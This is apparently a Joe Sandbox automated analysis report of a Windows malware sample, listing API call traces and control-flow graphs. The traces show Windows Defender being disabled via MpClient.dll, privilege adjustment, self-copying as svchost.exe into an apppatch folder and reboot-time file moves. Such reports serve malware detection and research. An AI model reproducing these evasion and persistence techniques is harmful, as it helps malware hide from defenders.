                                                                                                                                                                                                                • UnlockFile.KERNEL32(00000000,00401B44,00000000,?,00000000,?,?,?,00401B44), ref: 0040121C
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00401231
                                                                                                                                                                                                                • HeapValidate.KERNEL32(00000000), ref: 00401234
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00401241
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 00401244
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000,00000000,?,?,?,00401B44,00000000,00000000), ref: 00401264
                                                                                                                                                                                                                • CloseHandle.KERNELBASE(00000000,?,?,?,00401B44,00000000,00000000), ref: 00401275
                                                                                                                                                                                                                • IsBadWritePtr.KERNEL32(?,00000004), ref: 00401285
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1397114417.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1397114417.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_arxtPs1STE.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: FileHeap$Process$Handle$AllocateCloseCreateFreeInformationLockPointerReadSizeUnlockValidateWritememset
                                                                                                                                                                                                                • String ID: G,@
                                                                                                                                                                                                                • API String ID: 2214028410-3313068137
                                                                                                                                                                                                                • Opcode ID: c87fe8c59a66a8ba2057550360fc396b9d9c5c1a7bae7684166c86d3e9f90a93
                                                                                                                                                                                                                • Instruction ID: a7140257f329b7de85cf1082c2828f4b6f45ca3281c26892c76bebf1ae027e6a
                                                                                                                                                                                                                • Opcode Fuzzy Hash: c87fe8c59a66a8ba2057550360fc396b9d9c5c1a7bae7684166c86d3e9f90a93
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2C4167B1A00214BBEB109F959D89FAFBB7CEF84B11F10416AFB05F62D0D77459448BA8
                                                                                                                                                                                                                Function 004020E0 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 68libraryloaderCOMMON
                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                control_flow_graph 274 4020e0-40213c memset SHGetFolderPathA 275 4021a7-4021a9 274->275 276 40213e-40215f PathAppendA SetCurrentDirectoryA 274->276 278 4021b2-4021c2 275->278 279 4021ab-4021ac FreeLibrary 275->279 276->275 277 402161-402173 LoadLibraryA 276->277 277->275 280 402175-402183 GetProcAddress 277->280 279->278 280->275 281 402185-402192 280->281 281->275
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • memset.MSVCRT ref: 0040211E
                                                                                                                                                                                                                • SHGetFolderPathA.SHELL32(00000000,00000026,00000000,00000000,?), ref: 00402134
                                                                                                                                                                                                                • PathAppendA.SHLWAPI(?,Windows Defender), ref: 0040214A
                                                                                                                                                                                                                • SetCurrentDirectoryA.KERNELBASE(?), ref: 00402157
                                                                                                                                                                                                                • LoadLibraryA.KERNELBASE(MpClient.dll), ref: 00402166
                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,WDEnable), ref: 0040217B
                                                                                                                                                                                                                • FreeLibrary.KERNELBASE(00000000), ref: 004021AC
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1397114417.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1397114417.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_arxtPs1STE.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: LibraryPath$AddressAppendCurrentDirectoryFolderFreeLoadProcmemset
                                                                                                                                                                                                                • String ID: MpClient.dll$WDEnable$Windows Defender$v-@
                                                                                                                                                                                                                • API String ID: 1010965793-1794910726
                                                                                                                                                                                                                • Opcode ID: 9a8801f81893ad2c186c2148835d49196fca5eda48d8657e7ad32c24086763b8
                                                                                                                                                                                                                • Instruction ID: 6149f717096a9febd0c21d278ea6f34184d08bed9f30ffe58492fd99f82aed82
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9a8801f81893ad2c186c2148835d49196fca5eda48d8657e7ad32c24086763b8
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5A11D5B2940318BFD7219FA4DD49FAEB76CEB48710F00037AF705B22C0D27C4A418AA8
                                                                                                                                                                                                                Function 00401B20 Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 66memorylibraryloaderCOMMON
                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                control_flow_graph 283 401b20-401b35 284 401bd7-401bdd 283->284 285 401b3b-401b48 call 401150 283->285 285->284 288 401b4e-401b59 RtlImageNtHeader 285->288 289 401bb5-401bc9 GetProcessHeap HeapValidate 288->289 290 401b5b-401b7c GetTickCount GetModuleHandleA 288->290 289->284 293 401bcb-401bd1 GetProcessHeap HeapFree 289->293 291 401b95-401bb0 call 401000 290->291 292 401b7e-401b8c GetProcAddress 290->292 291->289 292->291 294 401b8e 292->294 293->284 294->291
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 00401150: CreateFileA.KERNELBASE(G,@,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,00000000,?,?,?,00401B44,00000000,00000000), ref: 00401177
                                                                                                                                                                                                                  • Part of subcall function 00401150: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,00401B44,00000000,00000000,?,00000000,00402C47), ref: 00401193
                                                                                                                                                                                                                  • Part of subcall function 00401150: GetProcessHeap.KERNEL32(00000008,?,?,?,?,00401B44,00000000,00000000,?,00000000,00402C47), ref: 004011B3
                                                                                                                                                                                                                  • Part of subcall function 00401150: RtlAllocateHeap.NTDLL(00000000,?,?,?,00401B44,00000000,00000000,?,00000000,00402C47), ref: 004011BA
                                                                                                                                                                                                                  • Part of subcall function 00401150: memset.MSVCRT ref: 004011CD
                                                                                                                                                                                                                  • Part of subcall function 00401150: SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000001,?,?,?,00401B44), ref: 004011EA
                                                                                                                                                                                                                  • Part of subcall function 00401150: LockFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,?,00401B44), ref: 004011FA
                                                                                                                                                                                                                  • Part of subcall function 00401150: ReadFile.KERNELBASE(00000000,00000000,?,00000000,00000000,?,?,?,00401B44), ref: 00401209
                                                                                                                                                                                                                  • Part of subcall function 00401150: UnlockFile.KERNEL32(00000000,00401B44,00000000,?,00000000,?,?,?,00401B44), ref: 0040121C
                                                                                                                                                                                                                  • Part of subcall function 00401150: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00401231
                                                                                                                                                                                                                  • Part of subcall function 00401150: HeapValidate.KERNEL32(00000000), ref: 00401234
                                                                                                                                                                                                                  • Part of subcall function 00401150: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00401241
                                                                                                                                                                                                                  • Part of subcall function 00401150: HeapFree.KERNEL32(00000000), ref: 00401244
                                                                                                                                                                                                                • RtlImageNtHeader.NTDLL(00000000), ref: 00401B4F
                                                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 00401B63
                                                                                                                                                                                                                • GetModuleHandleA.KERNEL32(ntdll.dll), ref: 00401B74
                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,RtlUniform), ref: 00401B84
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00401BBE
                                                                                                                                                                                                                • HeapValidate.KERNEL32(00000000), ref: 00401BC1
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00401BCE
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 00401BD1
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1397114417.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1397114417.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_arxtPs1STE.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heap$File$Process$FreeValidate$AddressAllocateCountCreateHandleHeaderImageLockModulePointerProcReadSizeTickUnlockmemset
                                                                                                                                                                                                                • String ID: G,@$RtlUniform$ntdll.dll
                                                                                                                                                                                                                • API String ID: 3168189189-905597979
                                                                                                                                                                                                                • Opcode ID: 2010ef54e731929bdeef478eef36219a5a0ac2089432c3df2103351bfe7421e8
                                                                                                                                                                                                                • Instruction ID: 64d0ad1f4564684b16137518c26293c6cc216b866d3c13d6df455aa1ddd35d97
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2010ef54e731929bdeef478eef36219a5a0ac2089432c3df2103351bfe7421e8
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 00118271600304ABD724ABB69D49F9B7BA89F85755F044136FB09F62E1EB38DD00CA68
                                                                                                                                                                                                                Function 00402680 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 228commemoryCOMMON
                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                control_flow_graph 296 402680-4026ac CoInitializeEx 297 4026ae-4026b1 296->297 298 4026bf-4026e7 GetModuleFileNameW SysAllocString 296->298 297->298 299 4026b3-4026b9 297->299 300 402869-40286f 298->300 301 4026ed-4026f8 SysAllocString 298->301 299->298 302 4028c4-4028c9 299->302 303 402871-402876 300->303 304 402879-40287e 300->304 305 402853-402861 SysFreeString 301->305 306 4026fe-40271f CoCreateInstance 301->306 303->304 309 402880-402885 304->309 310 402888-40288d 304->310 307 402863-402864 SysFreeString 305->307 308 402866 305->308 311 402725-40272a 306->311 312 402827-40282a 306->312 307->308 308->300 309->310 314 402897-40289c 310->314 315 40288f-402894 310->315 311->312 313 402730-402741 311->313 312->305 313->305 323 402747-402758 313->323 316 4028a6-4028ab 314->316 317 40289e-4028a3 314->317 315->314 318 4028b5-4028b7 316->318 319 4028ad-4028b2 316->319 317->316 321 4028b9-4028bc 318->321 322 4028be CoUninitialize 318->322 319->318 321->302 321->322 322->302 323->305 325 40275e-402768 323->325 326 40276d-40276f 325->326 326->305 327 402775-40277c 326->327 328 402851 327->328 329 402782-402793 327->329 328->305 329->328 331 402799-4027b1 329->331 333 4027b3-4027d3 CoCreateInstance 331->333 334 40282c-40283d 331->334 335 4027d5-4027da 333->335 336 4027dc 333->336 334->328 340 40283f-402843 334->340 335->336 337 4027de-4027e3 335->337 336->337 337->328 339 4027e5-4027f0 337->339 339->328 343 4027f2-402803 339->343 340->328 341 402845-40284e 340->341 341->328 343->328 345 402805-402814 343->345 345->328 347 402816-402825 345->347 347->328
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • CoInitializeEx.COMBASE(00000000,00000002), ref: 0040269F
                                                                                                                                                                                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000), ref: 004026CD
                                                                                                                                                                                                                • SysAllocString.OLEAUT32(?), ref: 004026E0
                                                                                                                                                                                                                • SysAllocString.OLEAUT32(Windows Explorer), ref: 004026F2
                                                                                                                                                                                                                • CoCreateInstance.OLE32(00404E70,00000000,00004401,00404E80,?), ref: 0040271B
                                                                                                                                                                                                                • CoCreateInstance.OLE32(00404E90,00000000,00004401,00404EA0,?), ref: 004027CF
                                                                                                                                                                                                                • SysFreeString.OLEAUT32(00402DB5), ref: 0040285D
                                                                                                                                                                                                                • SysFreeString.OLEAUT32(00000000), ref: 00402864
                                                                                                                                                                                                                • CoUninitialize.COMBASE ref: 004028BE
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1397114417.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1397114417.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_arxtPs1STE.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: String$AllocCreateFreeInstance$FileInitializeModuleNameUninitialize
                                                                                                                                                                                                                • String ID: Windows Explorer
                                                                                                                                                                                                                • API String ID: 1140695583-228612681
                                                                                                                                                                                                                • Opcode ID: 4af7e25e07fe91e1fd00f1fb65f3c817a061b1e1e25a39bc6d6eebae34654fce
                                                                                                                                                                                                                • Instruction ID: b52a01207190e4a30f96b10a649eeabca6697c1dd3b0d782d0755018a236c0da
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4af7e25e07fe91e1fd00f1fb65f3c817a061b1e1e25a39bc6d6eebae34654fce
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2E714175A006169FCB10EB99CD88DAFB7B9AF88300B24816AE504F73D0D7B5ED42CB54
                                                                                                                                                                                                                Function 00401E00 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 54threadCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetCurrentThread.KERNEL32 ref: 00401E10
                                                                                                                                                                                                                • OpenThreadToken.ADVAPI32(00000000,?,?,?,?,0040104F,?,?,?,?,00401BB5,00000000), ref: 00401E17
                                                                                                                                                                                                                • GetCurrentProcess.KERNEL32(00000020,0040104F,?,?,?,?,0040104F,?,?,?,?,00401BB5,00000000), ref: 00401E27
                                                                                                                                                                                                                • OpenProcessToken.ADVAPI32(00000000,?,?,?,?,0040104F,?,?,?,?,00401BB5,00000000), ref: 00401E2E
                                                                                                                                                                                                                • LookupPrivilegeValueA.ADVAPI32(00000000,SeSecurityPrivilege,?), ref: 00401E51
                                                                                                                                                                                                                • AdjustTokenPrivileges.KERNELBASE(0040104F,00000000,00000001,00000000,00000000,00000000), ref: 00401E6B
                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 00401E75
                                                                                                                                                                                                                • CloseHandle.KERNELBASE(0040104F), ref: 00401E86
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1397114417.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1397114417.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_arxtPs1STE.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Token$CurrentOpenProcessThread$AdjustCloseErrorHandleLastLookupPrivilegePrivilegesValue
                                                                                                                                                                                                                • String ID: SeSecurityPrivilege
                                                                                                                                                                                                                • API String ID: 731831024-2333288578
                                                                                                                                                                                                                • Opcode ID: 0b5c4ba04f49aa1d8c4809081d8a63f9d909b8f533a1819c24dc1b0a7e06f584
                                                                                                                                                                                                                • Instruction ID: 2f4dd94adce221d10feffccf969df1866f37505423b255349c6b180ac4db3a06
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0b5c4ba04f49aa1d8c4809081d8a63f9d909b8f533a1819c24dc1b0a7e06f584
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 92113CB6A00205ABE710DBE0DE0DFAF7B7CAB84B41F104129BB05F61D0D7749A04C7A9
                                                                                                                                                                                                                Function 00402360 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 74filetimeCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • CreateFileA.KERNELBASE(\\.\pipe\acsipc_server,C0000000,00000003,?,00000003,80000080,00000000,00000000), ref: 004023F6
                                                                                                                                                                                                                • WriteFile.KERNEL32(00000000,D48A445E,00000028,?,00000000), ref: 00402416
                                                                                                                                                                                                                • GetSystemTimeAsFileTime.KERNEL32(?), ref: 0040241C
                                                                                                                                                                                                                • WriteFile.KERNEL32(00000000,B5CB6C63,0000001C,?,00000000), ref: 0040243A
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 0040243D
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1397114417.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1397114417.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_arxtPs1STE.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: File$TimeWrite$CloseCreateHandleSystem
                                                                                                                                                                                                                • String ID: \\.\pipe\acsipc_server
                                                                                                                                                                                                                • API String ID: 3225117150-898603304
                                                                                                                                                                                                                • Opcode ID: 09079f795ad6bdb91afb2c9b6928e581e643feef602d34b17a80bf8da01f816f
                                                                                                                                                                                                                • Instruction ID: f0829fbf90d271a43df41d43683be69a37a07176176bc6acbc5691eaf7b0b3d2
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 09079f795ad6bdb91afb2c9b6928e581e643feef602d34b17a80bf8da01f816f
                                                                                                                                                                                                                • Instruction Fuzzy Hash: CA31F2B1C0121CAFDB10DFD9D985AEEFBB8FB48314F10422AE614BB280D7B41A458F95
                                                                                                                                                                                                                Function 00402A70 Relevance: 51.0, APIs: 22, Strings: 7, Instructions: 223memorylibraryloaderCOMMON
                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • VirtualQuery.KERNEL32(00401CB0,?,0000001C,00000000,00000000,7702DB30), ref: 00402AAB
                                                                                                                                                                                                                • GetModuleFileNameA.KERNEL32(?,?,00000104), ref: 00402AC3
                                                                                                                                                                                                                • PathFileExistsA.KERNELBASE(?), ref: 00402AE4
                                                                                                                                                                                                                • GetSystemWindowsDirectoryA.KERNEL32(?,00000104), ref: 00402AFC
                                                                                                                                                                                                                • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 00402B3D
                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 00402B4D
                                                                                                                                                                                                                • GetCurrentProcess.KERNEL32(?), ref: 00402B5E
                                                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 00402B96
                                                                                                                                                                                                                  • Part of subcall function 00401390: GetTickCount.KERNEL32 ref: 0040139B
                                                                                                                                                                                                                  • Part of subcall function 00401390: GetModuleHandleA.KERNEL32(ntdll.dll,?,00402BA2,00000000), ref: 004013AC
                                                                                                                                                                                                                  • Part of subcall function 00401390: GetProcAddress.KERNEL32(00000000,RtlUniform), ref: 004013BC
                                                                                                                                                                                                                  • Part of subcall function 00401420: GetTickCount.KERNEL32 ref: 0040144A
                                                                                                                                                                                                                  • Part of subcall function 00401420: GetModuleHandleA.KERNEL32(ntdll.dll,?,00402BAE,-00000006,00000000), ref: 00401457
                                                                                                                                                                                                                  • Part of subcall function 00401420: GetProcAddress.KERNEL32(00000000,RtlUniform), ref: 00401463
                                                                                                                                                                                                                • _snprintf.MSVCRT ref: 00402C10
                                                                                                                                                                                                                • CopyFileA.KERNEL32(?,?,00000001), ref: 00402C28
                                                                                                                                                                                                                • RtlImageNtHeader.NTDLL(00000000), ref: 00402C5A
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00402C85
                                                                                                                                                                                                                • HeapValidate.KERNEL32(00000000), ref: 00402C88
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00402C94
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 00402C97
                                                                                                                                                                                                                • MoveFileExA.KERNEL32(?,?,00000004(MOVEFILE_DELAY_UNTIL_REBOOT)), ref: 00402CB6
                                                                                                                                                                                                                • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 00402CC5
                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 00402CD5
                                                                                                                                                                                                                • GetCurrentProcess.KERNEL32(?), ref: 00402CE6
                                                                                                                                                                                                                • GlobalFindAtomA.KERNEL32(Wed Jul 6 06:49:26 20111), ref: 00402D04
                                                                                                                                                                                                                • ExitProcess.KERNEL32 ref: 00402D15
                                                                                                                                                                                                                • GlobalAddAtomA.KERNEL32(Wed Jul 6 06:49:26 20111), ref: 00402D20
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1397114417.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1397114417.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_arxtPs1STE.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ModuleProcess$AddressFileHandleHeapProc$CountTick$AtomCurrentGlobal$CopyDirectoryExistsExitFindFreeHeaderImageMoveNamePathQuerySystemValidateVirtualWindows_snprintf
                                                                                                                                                                                                                • String ID: %s_$.dat$IsWow64Process$Wed Jul 6 06:49:26 20111$\apppatch\$kernel32.dll$svchost.exe
                                                                                                                                                                                                                • API String ID: 4049655197-3112416296
                                                                                                                                                                                                                • Opcode ID: 66aefa0bda43174da8d304fb35afc24c9e162c35573b710bb5f0be43539d63f7
                                                                                                                                                                                                                • Instruction ID: 5ff553944d99263ee06e3162097b0b7c6440a9b95b570a66abc1ee1896f9e821
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 66aefa0bda43174da8d304fb35afc24c9e162c35573b710bb5f0be43539d63f7
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 28716FB15043419BC710EF609E9C96BBBE8BBD8300F44493EF786B72A1DB749944CB99
                                                                                                                                                                                                                Function 004001CA Relevance: 25.0, APIs: 12, Strings: 1, Instructions: 2235fileCOMMON
                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                control_flow_graph 173 4001ca-4001e3 175 4001e5-400258 173->175 176 400259 173->176 177 40025a-401011 175->177 176->177 182 401017-40101a 177->182 183 40113c-401141 177->183 182->183 184 401020-401022 182->184 184->183 185 401028-401044 CreateFileA 184->185 186 401139 185->186 187 40104a-401051 call 401e00 185->187 186->183 190 401053-401068 ConvertStringSecurityDescriptorToSecurityDescriptorW 187->190 191 4010aa-4010f3 SetFilePointer LockFile WriteFile UnlockFile 187->191 190->191 194 40106a-401089 GetSecurityDescriptorSacl 190->194 192 401105 191->192 193 4010f5-401103 SetEndOfFile 191->193 197 401108-401111 192->197 193->192 193->197 195 4010a0-4010a4 LocalFree 194->195 196 40108b-40109a SetNamedSecurityInfoA 194->196 195->191 196->195 198 401113-401120 GetHandleInformation 197->198 199 40112f-401136 197->199 198->199 200 401122-401126 198->200 200->199 201 401128-401129 CloseHandle 200->201 201->199
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • CreateFileA.KERNELBASE(00000000,C0000000,00000003,00000000,00000002,00000080,00000000,00000000,00000000,?,?,?,?,00401BB5,00000000), ref: 00401039
                                                                                                                                                                                                                  • Part of subcall function 00401E00: GetCurrentThread.KERNEL32 ref: 00401E10
                                                                                                                                                                                                                  • Part of subcall function 00401E00: OpenThreadToken.ADVAPI32(00000000,?,?,?,?,0040104F,?,?,?,?,00401BB5,00000000), ref: 00401E17
                                                                                                                                                                                                                  • Part of subcall function 00401E00: GetCurrentProcess.KERNEL32(00000020,0040104F,?,?,?,?,0040104F,?,?,?,?,00401BB5,00000000), ref: 00401E27
                                                                                                                                                                                                                  • Part of subcall function 00401E00: OpenProcessToken.ADVAPI32(00000000,?,?,?,?,0040104F,?,?,?,?,00401BB5,00000000), ref: 00401E2E
                                                                                                                                                                                                                  • Part of subcall function 00401E00: LookupPrivilegeValueA.ADVAPI32(00000000,SeSecurityPrivilege,?), ref: 00401E51
                                                                                                                                                                                                                  • Part of subcall function 00401E00: AdjustTokenPrivileges.KERNELBASE(0040104F,00000000,00000001,00000000,00000000,00000000), ref: 00401E6B
                                                                                                                                                                                                                  • Part of subcall function 00401E00: GetLastError.KERNEL32 ref: 00401E75
                                                                                                                                                                                                                  • Part of subcall function 00401E00: CloseHandle.KERNELBASE(0040104F), ref: 00401E86
                                                                                                                                                                                                                • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;;NRNWNX;;;LW),00000001,?,00000000), ref: 00401060
                                                                                                                                                                                                                • GetSecurityDescriptorSacl.ADVAPI32(?,?,00401BB5,?), ref: 00401081
                                                                                                                                                                                                                • SetNamedSecurityInfoA.ADVAPI32(00000000,00000001,00000010,00000000,00000000,00000000,00000000), ref: 0040109A
                                                                                                                                                                                                                • LocalFree.KERNEL32(?), ref: 004010A4
                                                                                                                                                                                                                • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000001), ref: 004010B8
                                                                                                                                                                                                                • LockFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 004010C7
                                                                                                                                                                                                                • WriteFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000), ref: 004010D9
                                                                                                                                                                                                                • UnlockFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 004010E9
                                                                                                                                                                                                                • SetEndOfFile.KERNELBASE(00000000), ref: 004010F6
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000,00000000), ref: 00401118
                                                                                                                                                                                                                • CloseHandle.KERNELBASE(00000000), ref: 00401129
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1397114417.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1397114417.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_arxtPs1STE.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: File$Security$DescriptorHandleToken$CloseCurrentOpenProcessThread$AdjustConvertCreateErrorFreeInfoInformationLastLocalLockLookupNamedPointerPrivilegePrivilegesSaclStringUnlockValueWrite
                                                                                                                                                                                                                • String ID: S:(ML;;NRNWNX;;;LW)
                                                                                                                                                                                                                • API String ID: 1027056982-820036962
                                                                                                                                                                                                                • Opcode ID: 81d4fb4f5fac3a8a28ffc8fda7917889cd3cc1cb556f91fb1df1ae6cc93ce86d
                                                                                                                                                                                                                • Instruction ID: e082a392c3e1c8ea6bcbabec48e58df7c8b9917df2aee0f20a935e5e0ee169a7
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 81d4fb4f5fac3a8a28ffc8fda7917889cd3cc1cb556f91fb1df1ae6cc93ce86d
                                                                                                                                                                                                                • Instruction Fuzzy Hash: C4518E715093806FE7128B609D18BAA3FB99F47701F1941EBE680FA1E3D27C4D49C769
                                                                                                                                                                                                                Function 00402540 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 119fileCOMMON
                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • SHGetFolderPathA.SHELL32(00000000,00000023,00000000,00000000,?), ref: 0040255C
                                                                                                                                                                                                                • CreateFileA.KERNELBASE(?,C0000000,00000003,00000000,00000003,00000080,00000000,00000000), ref: 004025C0
                                                                                                                                                                                                                • SetFilePointer.KERNEL32(00000000,000017A8,00000000,00000000), ref: 004025E3
                                                                                                                                                                                                                • WriteFile.KERNEL32(00000000,00000000,00000001,?,00000000), ref: 004025F8
                                                                                                                                                                                                                • SetFilePointer.KERNEL32(00000000,00000B98,00000000,00000000), ref: 00402604
                                                                                                                                                                                                                • WriteFile.KERNEL32(00000000,00000000,00000001,?,00000000), ref: 00402613
                                                                                                                                                                                                                • SetFilePointer.KERNEL32(00000000,000017E4,00000000,00000000), ref: 0040261F
                                                                                                                                                                                                                • WriteFile.KERNEL32(00000000,00000000,00000001,?,00000000), ref: 0040262E
                                                                                                                                                                                                                • SetFilePointer.KERNEL32(00000000,000017DC,00000000,00000000), ref: 0040263A
